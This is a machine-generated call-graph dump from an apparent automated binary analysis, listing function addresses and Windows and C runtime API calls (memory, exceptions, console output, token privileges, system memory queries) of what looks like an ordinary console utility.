free 74795->74851 74797 ad8d65 74797->74789 74797->74817 74802 ad2f88 3 API calls 74798->74802 74835 ad3199 malloc _CxxThrowException free _CxxThrowException 74801->74835 74805 ad8e0c 74802->74805 74803 ad8d08 74831 ad31e5 malloc _CxxThrowException free _CxxThrowException 74803->74831 74837 ad8f57 memmove 74805->74837 74807 ad8e03 74836 ad3199 malloc _CxxThrowException free _CxxThrowException 74807->74836 74810 ad8e22 74811 ad8e26 74810->74811 74812 ad8e3b 74810->74812 74838 ad3221 malloc _CxxThrowException free _CxxThrowException 74810->74838 74843 ad1e40 free 74811->74843 74839 ad8f34 malloc _CxxThrowException 74812->74839 74816 ad8e49 74840 ad31e5 malloc _CxxThrowException free _CxxThrowException 74816->74840 74844 ad1e40 free 74817->74844 74819 ad8e56 74841 ad1e40 free 74819->74841 74821 ad8e62 74842 ad31e5 malloc _CxxThrowException free _CxxThrowException 74821->74842 74823->74783 74824->74776 74825->74790 74826->74779 74827->74787 74828->74777 74829->74792 74830->74803 74831->74782 74832->74787 74833->74754 74834->74797 74835->74807 74836->74805 74837->74810 74838->74812 74839->74816 74840->74819 74841->74821 74842->74811 74843->74817 74844->74783 74845->74762 74846->74775 74847->74783 74848->74773 74849->74786 74850->74795 74851->74787 74852->74783 74853->74726 74854->74723 74855 adc3bd 74856 adc3ca 74855->74856 74858 adc3db 74855->74858 74856->74858 74859 ad1e40 free 74856->74859 74859->74858 74860 afcefb 74861 afd0cc 74860->74861 74862 afcf03 74860->74862 74862->74861 74907 afcae9 VariantClear 74862->74907 74864 afcf59 74864->74861 74908 afcae9 VariantClear 74864->74908 74866 afcf71 74866->74861 74909 afcae9 VariantClear 74866->74909 74868 afcf87 74868->74861 74910 afcae9 VariantClear 74868->74910 74870 afcf9d 74870->74861 74911 afcae9 VariantClear 74870->74911 74872 afcfb3 74872->74861 74912 afcae9 VariantClear 74872->74912 74874 afcfc9 74874->74861 74913 ad4504 malloc _CxxThrowException 74874->74913 74876 afcfdc 74877 ad2e04 2 API calls 74876->74877 74879 afcfe7 74877->74879 74878 afd009 74881 afd07b 74878->74881 74883 afd080 74878->74883 74884 afd030 74878->74884 74879->74878 74880 ad2f88 3 API calls 74879->74880 74880->74878 74921 ad1e40 free 74881->74921 74918 af7a0c CharUpperW 74883->74918 74887 ad2e04 2 API calls 74884->74887 74885 afd0c4 74922 ad1e40 free 74885->74922 74890 afd038 74887->74890 74889 afd08b 74919 aefdbc 4 API calls 2 library calls 74889->74919 74891 ad2e04 2 API calls 74890->74891 74893 afd046 74891->74893 74914 aefdbc 4 API calls 2 library calls 74893->74914 74894 afd0a7 74896 ad2fec 3 API calls 74894->74896 74898 afd0b3 74896->74898 74897 afd057 74899 ad2fec 3 API calls 74897->74899 74920 ad1e40 free 74898->74920 74901 afd063 74899->74901 74915 ad1e40 free 74901->74915 74903 afd06b 74916 ad1e40 free 74903->74916 74905 afd073 74917 ad1e40 free 74905->74917 74907->74864 74908->74866 74909->74868 74910->74870 74911->74872 74912->74874 74913->74876 74914->74897 74915->74903 74916->74905 74917->74881 74918->74889 74919->74894 74920->74881 74921->74885 74922->74861 74923 b0c2e6 74924 b0c52f 74923->74924 74927 b0544f SetConsoleCtrlHandler 74924->74927 74926 b0c53b 74927->74926 74928 b56ba3 VirtualFree 74929 b67da0 WaitForSingleObject 74930 b67dc1 74929->74930 74931 b67dbb GetLastError 74929->74931 74932 b67dce CloseHandle 74930->74932 74933 b67ddf 74930->74933 74931->74930 74932->74933 74934 b67dd9 GetLastError 74932->74934 74934->74933 74935 b1bf67 74936 b1bf74 74935->74936 74940 b1bf85 74935->74940 74936->74940 74941 b1bf8c 74936->74941 74942 b1bf96 __EH_prolog 74941->74942 74958 b1d144 74942->74958 74946 b1bfd0 74965 ad1e40 free 74946->74965 74948 b1bfdb 74966 ad1e40 free 74948->74966 74950 b1bfe6 74967 b1c072 free ctype 74950->74967 74952 b1bff4 74968 aeaafa free VariantClear ctype 74952->74968 74954 b1c023 74969 af73d2 free VariantClear __EH_prolog ctype 74954->74969 74956 b1bf7f 74957 ad1e40 free 74956->74957 74957->74940 74960 b1d14e __EH_prolog 74958->74960 74970 b1d1b7 74960->74970 74963 b1bfc5 74964 ad1e40 free 74963->74964 74964->74946 74965->74948 74966->74950 74967->74952 74968->74954 74969->74956 74978 b1d23c 74970->74978 74972 b1d1ed 74985 ad1e40 free 74972->74985 74974 b1d209 74986 ad1e40 free 74974->74986 74976 b1d180 74977 b18e04 memset 74976->74977 74977->74963 74987 b1d2b8 74978->74987 74981 b1d25e 75004 ad1e40 free 74981->75004 74984 b1d275 74984->74972 74985->74974 74986->74976 75006 ad1e40 free 74987->75006 74989 b1d2c8 75007 ad1e40 free 74989->75007 74991 b1d2dc 75008 ad1e40 free 74991->75008 74993 b1d2e7 75009 ad1e40 free 74993->75009 74995 b1d2f2 75010 ad1e40 free 74995->75010 74997 b1d2fd 75011 ad1e40 free 74997->75011 74999 b1d308 75012 ad1e40 free 74999->75012 75001 b1d313 75002 b1d246 75001->75002 75013 ad1e40 free 75001->75013 75002->74981 75005 ad1e40 free 75002->75005 75004->74984 75005->74981 75006->74989 75007->74991 75008->74993 75009->74995 75010->74997 75011->74999 75012->75001 75013->75002 75014 b0a42c 75015 b0a435 fputs 75014->75015 75016 b0a449 75014->75016 75172 ad1fa0 fputc 75015->75172 75173 b0545d 75016->75173 75020 ad2e04 2 API calls 75021 b0a4a1 75020->75021 75177 af1858 75021->75177 75023 b0a4c9 75239 ad1e40 free 75023->75239 75025 b0a4d8 75026 b0a4ee 75025->75026 75027 b0c7d7 ctype 6 API calls 75025->75027 75028 b0a50e 75026->75028 75240 b057fb 75026->75240 75027->75026 75250 b0c73e 75028->75250 75033 b0ac17 75406 b02db9 free ctype 75033->75406 75034 ad1e0c ctype 2 API calls 75036 b0a53a 75034->75036 75040 b0a54d 75036->75040 75376 b0b0fa malloc _CxxThrowException __EH_prolog 75036->75376 75037 b0ac3a 75408 b0b96d _CxxThrowException 75037->75408 75038 b0ac23 75038->75037 75041 b0ac35 75038->75041 75043 ad2fec 3 API calls 75040->75043 75407 b0b988 33 API calls __aulldiv 75041->75407 75050 b0a586 75043->75050 75045 b0ac42 75409 ad1e40 free 75045->75409 75047 b0ac4d 75048 af3247 free 75047->75048 75049 b0ac5d 75048->75049 75410 ad1e40 free 75049->75410 75268 b0ad06 75050->75268 75054 b0ac7d 75411 ad11c2 free __EH_prolog ctype 75054->75411 75058 b0ac89 75059 ae3a29 5 API calls 75061 b0a62e 75059->75061 75149 b0aae5 75405 b02db9 free ctype 75149->75405 75172->75016 75174 b05473 75173->75174 75175 b05466 75173->75175 75174->75020 75414 ad275e malloc _CxxThrowException free ctype 75175->75414 75178 af1862 __EH_prolog 75177->75178 75415 af021a 75178->75415 75183 af18b9 75429 af1aa5 free __EH_prolog ctype 75183->75429 75185 af1935 75434 af1aa5 free __EH_prolog ctype 75185->75434 75186 af18c7 75430 b02db9 free ctype 75186->75430 75190 af1944 75211 af1966 75190->75211 75435 af1d73 5 API calls __EH_prolog 75190->75435 75191 af18d3 75191->75023 75192 b104d2 5 API calls 75198 af18db 75192->75198 75194 af1958 _CxxThrowException 75194->75211 75195 af19be 75442 aff1f1 malloc _CxxThrowException free _CxxThrowException 75195->75442 75197 ad2e04 2 API calls 75197->75211 75198->75185 75198->75192 75431 af0144 malloc _CxxThrowException free _CxxThrowException 75198->75431 75432 ad1524 malloc _CxxThrowException __EH_prolog ctype 75198->75432 75433 ad1e40 free 75198->75433 75200 af19d6 75202 af7ebb free 75200->75202 75204 af19e1 75202->75204 75205 ae12d4 4 API calls 75204->75205 75207 af19ea 75205->75207 75206 b104d2 5 API calls 75206->75211 75208 af7ebb free 75207->75208 75210 af19f7 75208->75210 75212 ae12d4 4 API calls 75210->75212 75211->75195 75211->75197 75211->75206 75436 ad631f 75211->75436 75440 ad1524 malloc _CxxThrowException __EH_prolog ctype 75211->75440 75441 ad1e40 free 75211->75441 75221 af19ff 75212->75221 75214 af1a4f 75444 ad1e40 free 75214->75444 75216 af1a57 75445 b02db9 free ctype 75216->75445 75218 ad1524 malloc _CxxThrowException 75218->75221 75219 af1a64 75446 b02db9 free ctype 75219->75446 75221->75214 75221->75218 75223 af1a83 75221->75223 75443 ad42e3 CharUpperW 75221->75443 75447 af1d73 5 API calls __EH_prolog 75223->75447 75225 af1a97 _CxxThrowException 75226 af1aa5 __EH_prolog 75225->75226 75448 ad1e40 free 75226->75448 75228 af1ac8 75449 af02e8 free ctype 75228->75449 75230 af1ad1 75450 af1eab free __EH_prolog ctype 75230->75450 75232 af1add 75451 ad1e40 free 75232->75451 75234 af1ae5 75452 ad1e40 free 75234->75452 75236 af1aed 75453 b02db9 free ctype 75236->75453 75238 af1afa 75238->75023 75239->75025 75241 b05805 __EH_prolog 75240->75241 75242 b05847 75241->75242 75243 ad26dd 2 API calls 75241->75243 75242->75028 75244 b05819 75243->75244 75633 b05678 75244->75633 75248 b0583f 75650 ad1e40 free 75248->75650 75251 b0c748 __EH_prolog 75250->75251 75252 b0c7d7 ctype 6 API calls 75251->75252 75253 b0c75d 75252->75253 75667 ad1e40 free 75253->75667 75255 b0c768 75668 af2c0b 75255->75668 75259 b0c77d 75674 ad1e40 free 75259->75674 75261 b0c785 75675 ad1e40 free 75261->75675 75263 b0c78d 75676 ad1e40 free 75263->75676 75265 b0c795 75266 af2c0b ctype free 75265->75266 75267 b0a51d 75266->75267 75267->75034 75267->75149 75269 b0ad29 2 API calls 75268->75269 75270 b0a5d8 75269->75270 75271 b0bf3e 75270->75271 75272 ad2fec 3 API calls 75271->75272 75273 b0bf85 75272->75273 75274 ad2fec 3 API calls 75273->75274 75275 b0a5ee 75274->75275 75275->75059 75376->75040 75405->75033 75406->75038 75407->75037 75408->75045 75409->75047 75410->75054 75411->75058 75414->75174 75416 af0224 __EH_prolog 75415->75416 75454 ae3d66 75416->75454 75419 af062e 75425 af0638 __EH_prolog 75419->75425 75420 af06de 75541 af019a malloc _CxxThrowException free memcpy 75420->75541 75422 af06e6 75542 af1453 26 API calls 2 library calls 75422->75542 75424 af06ee 75424->75183 75424->75198 75425->75420 75425->75424 75426 af01bc malloc _CxxThrowException free _CxxThrowException memcpy 75425->75426 75470 af0703 75425->75470 75540 b02db9 free ctype 75425->75540 75426->75425 75429->75186 75430->75191 75431->75198 75432->75198 75433->75198 75434->75190 75435->75194 75437 ad9245 75436->75437 75581 ad90da 75437->75581 75440->75211 75441->75211 75442->75200 75443->75221 75444->75216 75445->75219 75446->75191 75447->75225 75448->75228 75449->75230 75450->75232 75451->75234 75452->75236 75453->75238 75465 b6fb10 75454->75465 75456 ae3d70 GetCurrentProcess 75466 ae3e04 75456->75466 75458 ae3d8d OpenProcessToken 75459 ae3d9e LookupPrivilegeValueW 75458->75459 75460 ae3de3 75458->75460 75459->75460 75461 ae3dc0 AdjustTokenPrivileges 75459->75461 75462 ae3e04 CloseHandle 75460->75462 75461->75460 75463 ae3dd5 GetLastError 75461->75463 75464 ae3def 75462->75464 75463->75460 75464->75419 75465->75456 75467 ae3e0d 75466->75467 75468 ae3e11 CloseHandle 75466->75468 75467->75458 75469 ae3e21 75468->75469 75469->75458 75471 af070d __EH_prolog 75470->75471 75477 af0c83 75471->75477 75482 ad2da9 2 API calls 75471->75482 75483 af0ab5 75471->75483 75485 af0b40 75471->75485 75492 ad2e04 2 API calls 75471->75492 75500 ad2fec 3 API calls 75471->75500 75512 af0b26 75471->75512 75515 b104d2 malloc _CxxThrowException free _CxxThrowException memcpy 75471->75515 75528 b02db9 free ctype 75471->75528 75535 af0b48 75471->75535 75537 ad1524 malloc _CxxThrowException 75471->75537 75539 ad1e40 free ctype 75471->75539 75543 ad2f4a malloc _CxxThrowException free ctype 75471->75543 75544 ad1089 malloc _CxxThrowException free _CxxThrowException 75471->75544 75545 af13eb 5 API calls 2 library calls 75471->75545 75546 af050b 75471->75546 75551 af0021 GetLastError 75471->75551 75552 ad49bd 9 API calls 2 library calls 75471->75552 75553 af0306 12 API calls 75471->75553 75554 aeff00 5 API calls 2 library calls 75471->75554 75555 af057d 16 API calls 2 library calls 75471->75555 75556 af0f8e 24 API calls 2 library calls 75471->75556 75557 ad472e CharUpperW 75471->75557 75558 ae8984 malloc _CxxThrowException free _CxxThrowException memcpy 75471->75558 75559 af0ef4 68 API calls 2 library calls 75471->75559 75472 af0e1d 75578 af0416 18 API calls 2 library calls 75472->75578 75474 af0e47 75475 af0ea6 75474->75475 75579 af117d 68 API calls 2 library calls 75474->75579 75580 b1ec78 free ctype 75475->75580 75476 af0d11 75572 ad7496 7 API calls 2 library calls 75476->75572 75477->75472 75477->75476 75480 af0c13 75569 ad1e40 free 75480->75569 75482->75471 75483->75480 75487 ad2da9 2 API calls 75483->75487 75493 ad2e04 2 API calls 75483->75493 75505 ad2fec 3 API calls 75483->75505 75509 af050b 44 API calls 75483->75509 75518 af0c79 75483->75518 75526 ad1e40 free ctype 75483->75526 75560 ad2f4a malloc _CxxThrowException free ctype 75483->75560 75565 ad1089 malloc _CxxThrowException free _CxxThrowException 75483->75565 75566 af13eb 5 API calls 2 library calls 75483->75566 75567 af0ef4 68 API calls 2 library calls 75483->75567 75568 b02db9 free ctype 75483->75568 75570 af0021 GetLastError 75483->75570 75485->75425 75486 af0de0 75574 b02db9 free ctype 75486->75574 75487->75483 75488 ad2f1c 2 API calls 75521 af0d29 75488->75521 75491 af0df8 75576 ad1e40 free 75491->75576 75492->75471 75493->75483 75496 af0e02 75577 b02db9 free ctype 75496->75577 75499 ad2e04 2 API calls 75499->75521 75500->75471 75503 ad2fec 3 API calls 75503->75521 75505->75483 75509->75483 75511 af0df3 75575 ad1e40 free 75511->75575 75561 ad1e40 free 75512->75561 75515->75471 75517 ad1e40 free ctype 75517->75521 75571 ad1e40 free 75518->75571 75519 af0b30 75562 ad1e40 free 75519->75562 75521->75486 75521->75488 75521->75491 75521->75499 75521->75503 75521->75511 75521->75517 75573 af117d 68 API calls 2 library calls 75521->75573 75524 af0b38 75563 ad1e40 free 75524->75563 75526->75483 75528->75471 75564 b02db9 free ctype 75535->75564 75537->75471 75539->75471 75540->75425 75541->75422 75542->75424 75543->75471 75544->75471 75545->75471 75547 ad6c72 44 API calls 75546->75547 75550 af051e 75547->75550 75548 af0575 75548->75471 75549 ad2f88 3 API calls 75549->75548 75550->75548 75550->75549 75551->75471 75552->75471 75553->75471 75554->75471 75555->75471 75556->75471 75557->75471 75558->75471 75559->75471 75560->75483 75561->75519 75562->75524 75563->75485 75564->75512 75565->75483 75566->75483 75567->75483 75568->75483 75569->75485 75570->75483 75571->75477 75572->75521 75573->75521 75574->75485 75575->75491 75576->75496 75577->75485 75578->75474 75579->75474 75580->75485 75582 ad90e4 __EH_prolog 75581->75582 75583 ad2f88 3 API calls 75582->75583 75585 ad90f7 75583->75585 75584 ad915d 75587 ad2e04 2 API calls 75584->75587 75585->75584 75586 ad9109 75585->75586 75591 ad9155 75586->75591 75594 ad2e47 2 API calls 75586->75594 75589 ad9165 75587->75589 75588 ad91be 75627 ad6332 6 API calls 2 library calls 75588->75627 75589->75588 75592 ad9174 75589->75592 75591->75211 75595 ad2f88 3 API calls 75592->75595 75593 ad917d 75596 ad91ca 75593->75596 75625 ad859e malloc _CxxThrowException free _CxxThrowException 75593->75625 75597 ad9122 75594->75597 75595->75593 75632 ad1e40 free 75596->75632 75622 ad8f57 memmove 75597->75622 75600 ad912e 75603 ad914d 75600->75603 75623 ad31e5 malloc _CxxThrowException free _CxxThrowException 75600->75623 75602 ad9185 75606 ad2e04 2 API calls 75602->75606 75624 ad1e40 free 75603->75624 75607 ad9197 75606->75607 75608 ad919f 75607->75608 75609 ad91ce 75607->75609 75611 ad91b9 75608->75611 75626 ad1089 malloc _CxxThrowException free _CxxThrowException 75608->75626 75610 ad2f88 3 API calls 75609->75610 75610->75611 75628 ad3199 malloc _CxxThrowException free _CxxThrowException 75611->75628 75614 ad91e6 75629 ad8f57 memmove 75614->75629 75616 ad91ee 75617 ad91f2 75616->75617 75619 ad2fec 3 API calls 75616->75619 75631 ad1e40 free 75617->75631 75620 ad9212 75619->75620 75630 ad31e5 malloc _CxxThrowException free _CxxThrowException 75620->75630 75622->75600 75623->75603 75624->75591 75625->75602 75626->75611 75627->75593 75628->75614 75629->75616 75630->75617 75631->75596 75632->75591 75634 b056b1 75633->75634 75635 b05689 75633->75635 75651 b05593 75634->75651 75637 b05593 6 API calls 75635->75637 75639 b056a5 75637->75639 75641 ad28a1 5 API calls 75639->75641 75641->75634 75643 b0570e fputs 75649 ad1fa0 fputc 75643->75649 75645 b056ef 75646 b05593 6 API calls 75645->75646 75647 b05701 75646->75647 75648 b05711 6 API calls 75647->75648 75648->75643 75649->75248 75650->75242 75652 b055ad 75651->75652 75653 ad28a1 5 API calls 75652->75653 75654 b055b8 75653->75654 75655 ad286d 5 API calls 75654->75655 75656 b055bf 75655->75656 75657 ad28a1 5 API calls 75656->75657 75658 b055c7 75657->75658 75659 b05711 75658->75659 75660 b05721 75659->75660 75661 b056e0 75659->75661 75662 ad28a1 5 API calls 75660->75662 75661->75643 75665 ad2881 malloc _CxxThrowException free memcpy _CxxThrowException 75661->75665 75663 b0572b 75662->75663 75666 b055cd 6 API calls 75663->75666 75665->75645 75666->75661 75667->75255 75677 ad1e40 free 75668->75677 75670 af2c16 75678 ad1e40 free 75670->75678 75672 af2c1e 75673 ad1e40 free 75672->75673 75673->75259 75674->75261 75675->75263 75676->75265 75677->75670 75678->75672 76498 b0acd3 76499 b0acf1 76498->76499 76500 b0ace0 76498->76500 76500->76499 76504 b0acf8 76500->76504 76505 b0c0b3 __EH_prolog 76504->76505 76506 b0c0ed 76505->76506 76509 af7193 free 76505->76509 76512 ad1e40 free 76505->76512 76513 ad1e40 free 76506->76513 76508 b0aceb 76511 ad1e40 free 76508->76511 76509->76505 76511->76499 76512->76505 76513->76508 76514 b569d0 76515 b569d4 76514->76515 76516 b569d7 malloc 76514->76516 76518 afd948 76548 afdac7 76518->76548 76520 afd94f 76521 ad2e04 2 API calls 76520->76521 76522 afd97b 76521->76522 76523 ad2e04 2 API calls 76522->76523 76524 afd987 76523->76524 76527 afd9e7 76524->76527 76556 ad6404 76524->76556 76529 afda0f 76527->76529 76541 afda36 76527->76541 76581 ad1e40 free 76529->76581 76532 afd9bf 76579 ad1e40 free 76532->76579 76533 afda94 76585 ad1e40 free 76533->76585 76534 afda17 76582 ad1e40 free 76534->76582 76538 afd9c7 76580 ad1e40 free 76538->76580 76539 afda9c 76586 ad1e40 free 76539->76586 76540 ad2da9 2 API calls 76540->76541 76541->76533 76541->76540 76544 b104d2 5 API calls 76541->76544 76583 ad1524 malloc _CxxThrowException __EH_prolog ctype 76541->76583 76584 ad1e40 free 76541->76584 76544->76541 76545 afd9cf 76549 afdad1 __EH_prolog 76548->76549 76550 ad2e04 2 API calls 76549->76550 76551 afdb33 76550->76551 76552 ad2e04 2 API calls 76551->76552 76553 afdb3f 76552->76553 76554 ad2e04 2 API calls 76553->76554 76555 afdb55 76554->76555 76555->76520 76557 ad631f 9 API calls 76556->76557 76558 ad6414 76557->76558 76559 ad6423 76558->76559 76560 ad2f88 3 API calls 76558->76560 76561 ad2f88 3 API calls 76559->76561 76560->76559 76562 ad643d 76561->76562 76563 ae7e5a 76562->76563 76564 ae7e64 __EH_prolog 76563->76564 76587 ae8179 76564->76587 76567 af7ebb free 76568 ae7e7f 76567->76568 76569 ad2fec 3 API calls 76568->76569 76570 ae7e9a 76569->76570 76571 ad2da9 2 API calls 76570->76571 76572 ae7ea7 76571->76572 76573 ad6c72 44 API calls 76572->76573 76574 ae7eb7 76573->76574 76592 ad1e40 free 76574->76592 76576 ae7ecb 76577 ae7ed8 76576->76577 76593 ad757d GetLastError 76576->76593 76577->76527 76577->76532 76579->76538 76580->76545 76581->76534 76582->76545 76583->76541 76584->76541 76585->76539 76586->76545 76591 ae8906 76587->76591 76588 ae7e77 76588->76567 76591->76588 76594 ae8804 free ctype 76591->76594 76595 ad1e40 free 76591->76595 76592->76576 76593->76577 76594->76591 76595->76591 76596 adb144 76597 adb153 76596->76597 76599 adb159 76596->76599 76598 ae11b4 107 API calls 76597->76598 76598->76599 76600 afa7c5 76618 afa7e9 76600->76618 76651 afa96b 76600->76651 76601 afade3 76705 ad1e40 free 76601->76705 76603 afa952 76603->76651 76686 afe0b0 6 API calls 76603->76686 76604 afadeb 76706 ad1e40 free 76604->76706 76608 afac1e 76692 ad1e40 free 76608->76692 76609 afae99 76610 ad1e0c ctype 2 API calls 76609->76610 76613 afaea9 memset memset 76610->76613 76616 afaedd 76613->76616 76614 afac26 76693 ad1e40 free 76614->76693 76615 afadf3 76615->76609 76620 b104d2 malloc _CxxThrowException free _CxxThrowException memcpy 76615->76620 76707 ad1e40 free 76616->76707 76618->76603 76625 b104d2 5 API calls 76618->76625 76685 afe0b0 6 API calls 76618->76685 76620->76615 76622 afaee5 76708 ad1e40 free 76622->76708 76625->76618 76626 afaef0 76709 ad1e40 free 76626->76709 76629 afc430 76711 ad1e40 free 76629->76711 76632 afc438 76712 ad1e40 free 76632->76712 76633 afac6c 76694 ad1e40 free 76633->76694 76635 afc443 76713 ad1e40 free 76635->76713 76639 afac85 76695 ad1e40 free 76639->76695 76640 afc44e 76714 ad1e40 free 76640->76714 76643 afc459 76645 afad88 76702 af8125 free ctype 76645->76702 76649 afad17 76699 af8125 free ctype 76649->76699 76650 afad93 76703 ad1e40 free 76650->76703 76651->76601 76651->76608 76651->76633 76651->76645 76651->76649 76652 afacbc 76651->76652 76667 ae101c 76651->76667 76670 af98f2 76651->76670 76676 afcc6f 76651->76676 76687 af9531 5 API calls __EH_prolog 76651->76687 76688 af80c1 malloc _CxxThrowException __EH_prolog 76651->76688 76689 afc820 5 API calls 2 library calls 76651->76689 76690 af814d 6 API calls 76651->76690 76691 af8125 free ctype 76651->76691 76696 af8125 free ctype 76652->76696 76656 afacc7 76697 ad1e40 free 76656->76697 76657 afad3c 76700 ad1e40 free 76657->76700 76658 afadac 76704 ad1e40 free 76658->76704 76662 afac2e 76710 ad1e40 free 76662->76710 76663 aface0 76698 ad1e40 free 76663->76698 76664 afad55 76701 ad1e40 free 76664->76701 76669 adb95a 6 API calls 76667->76669 76668 ae1028 76668->76651 76669->76668 76671 af98fc __EH_prolog 76670->76671 76715 af9987 76671->76715 76673 af9970 76673->76651 76674 af9911 76674->76673 76719 afef8d 12 API calls 2 library calls 76674->76719 76759 b1f445 76676->76759 76765 b15505 76676->76765 76769 b1cf91 76676->76769 76677 afcc8b 76681 afcccb 76677->76681 76777 af979e VariantClear __EH_prolog 76677->76777 76679 afccb1 76679->76681 76778 afcae9 VariantClear 76679->76778 76681->76651 76685->76618 76686->76651 76687->76651 76688->76651 76689->76651 76690->76651 76691->76651 76692->76614 76693->76662 76694->76639 76695->76662 76696->76656 76697->76663 76698->76662 76699->76657 76700->76664 76701->76662 76702->76650 76703->76658 76704->76662 76705->76604 76706->76615 76707->76622 76708->76626 76709->76662 76710->76629 76711->76632 76712->76635 76713->76640 76714->76643 76716 af9991 __EH_prolog 76715->76716 76720 b280aa 76716->76720 76717 af99a8 76717->76674 76719->76673 76721 b280b4 __EH_prolog 76720->76721 76722 ad1e0c ctype 2 API calls 76721->76722 76723 b280bf 76722->76723 76724 b280d3 76723->76724 76726 b1bdb5 76723->76726 76724->76717 76727 b1bdbf __EH_prolog 76726->76727 76732 b1be69 76727->76732 76729 b1bdef 76730 ad2e04 2 API calls 76729->76730 76731 b1be16 76730->76731 76731->76724 76733 b1be73 __EH_prolog 76732->76733 76736 b15e2b 76733->76736 76735 b1be7f 76735->76729 76737 b15e35 __EH_prolog 76736->76737 76742 b108b6 76737->76742 76739 b15e41 76747 aedfc9 malloc _CxxThrowException __EH_prolog 76739->76747 76741 b15e57 76741->76735 76748 ad9c60 76742->76748 76744 b108c4 76753 ad9c8f GetModuleHandleA GetProcAddress 76744->76753 76746 b108f3 __aulldiv 76746->76739 76747->76741 76758 ad9c4d GetCurrentProcess GetProcessAffinityMask 76748->76758 76750 ad9c6e 76751 ad9c80 GetSystemInfo 76750->76751 76752 ad9c79 76750->76752 76751->76744 76752->76744 76754 ad9cef GlobalMemoryStatus 76753->76754 76755 ad9cc4 GlobalMemoryStatusEx 76753->76755 76756 ad9d08 76754->76756 76755->76754 76757 ad9cce 76755->76757 76756->76757 76757->76746 76758->76750 76760 b1f455 76759->76760 76779 ae1092 76760->76779 76764 b1f478 76764->76677 76766 b1550f __EH_prolog 76765->76766 76795 b14e8a 76766->76795 76770 b1cf9b __EH_prolog 76769->76770 76771 b1f445 14 API calls 76770->76771 76772 b1d018 76771->76772 76774 b1d01f 76772->76774 77011 b21511 76772->77011 76774->76677 76775 b1d08b 76775->76774 77017 b22c5d 11 API calls 2 library calls 76775->77017 76777->76679 76778->76681 76781 adb95a 6 API calls 76779->76781 76780 ae10aa 76780->76764 76782 b1f1b2 76780->76782 76781->76780 76783 b1f1bc __EH_prolog 76782->76783 76792 ae1168 76783->76792 76785 b1f1d3 76786 b1f231 memcpy 76785->76786 76787 b1f21c _CxxThrowException 76785->76787 76788 b1f1e6 76785->76788 76790 b1f24c 76786->76790 76787->76786 76788->76764 76789 b1f2f0 memmove 76789->76790 76790->76788 76790->76789 76791 b1f31a memcpy 76790->76791 76791->76788 76793 ae111c 10 API calls 76792->76793 76794 ae117b 76793->76794 76794->76785 76796 b14e94 __EH_prolog 76795->76796 76797 ad2e04 2 API calls 76796->76797 76813 b14f1d 76796->76813 76798 b14ed7 76797->76798 76927 ae7fc5 76798->76927 76800 b14f37 76802 b14f41 76800->76802 76803 b14f63 76800->76803 76801 b14f0a 76804 ad965d VariantClear 76801->76804 76805 ad965d VariantClear 76802->76805 76806 ad2f88 3 API calls 76803->76806 76807 b14f15 76804->76807 76808 b14f4c 76805->76808 76809 b14f71 76806->76809 76948 ad1e40 free 76807->76948 76949 ad1e40 free 76808->76949 76812 ad965d VariantClear 76809->76812 76814 b14f80 76812->76814 76813->76677 76950 ae5bcf malloc _CxxThrowException 76814->76950 76816 b14f9a 76817 ad2e47 2 API calls 76816->76817 76818 b14fad 76817->76818 76819 ad2f1c 2 API calls 76818->76819 76820 b14fbd 76819->76820 76821 ad2e04 2 API calls 76820->76821 76822 b14fd1 76821->76822 76823 ad2e04 2 API calls 76822->76823 76829 b14fdd 76823->76829 76824 b15404 76989 ad1e40 free 76824->76989 76826 b1540c 76990 ad1e40 free 76826->76990 76828 b15414 76991 ad1e40 free 76828->76991 76829->76824 76951 ae5bcf malloc _CxxThrowException 76829->76951 76832 b15099 76834 ad2da9 2 API calls 76832->76834 76833 b1541c 76992 ad1e40 free 76833->76992 76836 b150a9 76834->76836 76838 ad2fec 3 API calls 76836->76838 76837 b15424 76993 ad1e40 free 76837->76993 76840 b150b6 76838->76840 76952 ad1e40 free 76840->76952 76841 b1542c 76994 ad1e40 free 76841->76994 76844 b150be 76953 ad1e40 free 76844->76953 76846 b150cd 76847 ad2f88 3 API calls 76846->76847 76848 b150e3 76847->76848 76849 b150f1 76848->76849 76850 b15100 76848->76850 76852 ad30ea 3 API calls 76849->76852 76954 ad3044 malloc _CxxThrowException free ctype 76850->76954 76853 b150fe 76852->76853 76955 ae1029 6 API calls 76853->76955 76855 b1511a 76856 b15120 76855->76856 76857 b1516b 76855->76857 76956 ad1e40 free 76856->76956 76962 ae089e malloc _CxxThrowException free _CxxThrowException memcpy 76857->76962 76860 b15128 76957 ad1e40 free 76860->76957 76861 b15187 76864 b104d2 5 API calls 76861->76864 76863 b15130 76958 ad1e40 free 76863->76958 76866 b151ba 76864->76866 76963 b10516 malloc _CxxThrowException ctype 76866->76963 76867 b15138 76959 ad1e40 free 76867->76959 76870 b151c5 76875 b151f5 76870->76875 76876 b1522d 76870->76876 76871 b15140 76960 ad1e40 free 76871->76960 76873 b15148 76961 ad1e40 free 76873->76961 76964 ad1e40 free 76875->76964 76877 ad2e04 2 API calls 76876->76877 76925 b15235 76877->76925 76879 b151fd 76965 ad1e40 free 76879->76965 76882 b15205 76966 ad1e40 free 76882->76966 76883 b1532e 76975 ad1e40 free 76883->76975 76886 b1520d 76967 ad1e40 free 76886->76967 76887 b15347 76887->76824 76889 b15358 76887->76889 76976 ad1e40 free 76889->76976 76890 b15215 76968 ad1e40 free 76890->76968 76892 b153a3 76982 ad1e40 free 76892->76982 76894 b15360 76977 ad1e40 free 76894->76977 76895 b1521d 76969 ad1e40 free 76895->76969 76899 b15368 76978 ad1e40 free 76899->76978 76902 b153bc 76983 ad1e40 free 76902->76983 76907 b153c4 76984 ad1e40 free 76907->76984 76908 b104d2 5 API calls 76908->76925 76911 b153cc 76985 ad1e40 free 76911->76985 76917 b153d4 76924 ad2e04 2 API calls 76924->76925 76925->76883 76925->76892 76925->76908 76925->76924 76970 b1545c 5 API calls 2 library calls 76925->76970 76971 ae1029 6 API calls 76925->76971 76972 ae089e malloc _CxxThrowException free _CxxThrowException memcpy 76925->76972 76973 b10516 malloc _CxxThrowException ctype 76925->76973 76974 ad1e40 free 76925->76974 76928 ae7fcf __EH_prolog 76927->76928 76930 ae8061 76928->76930 76932 ae805c 76928->76932 76933 ae8019 76928->76933 76937 ae7ff4 76928->76937 76929 ae800a 77004 ad9736 VariantClear 76929->77004 76930->76932 76945 ae8025 76930->76945 77003 ad9630 VariantClear 76932->77003 76936 ae801e 76933->76936 76933->76937 76934 ae80b8 76941 ad965d VariantClear 76934->76941 76938 ae8042 76936->76938 76939 ae8022 76936->76939 76937->76929 76995 ad950d 76937->76995 77001 ad9597 VariantClear 76938->77001 76942 ae8032 76939->76942 76939->76945 76944 ae80c0 76941->76944 77000 ad9604 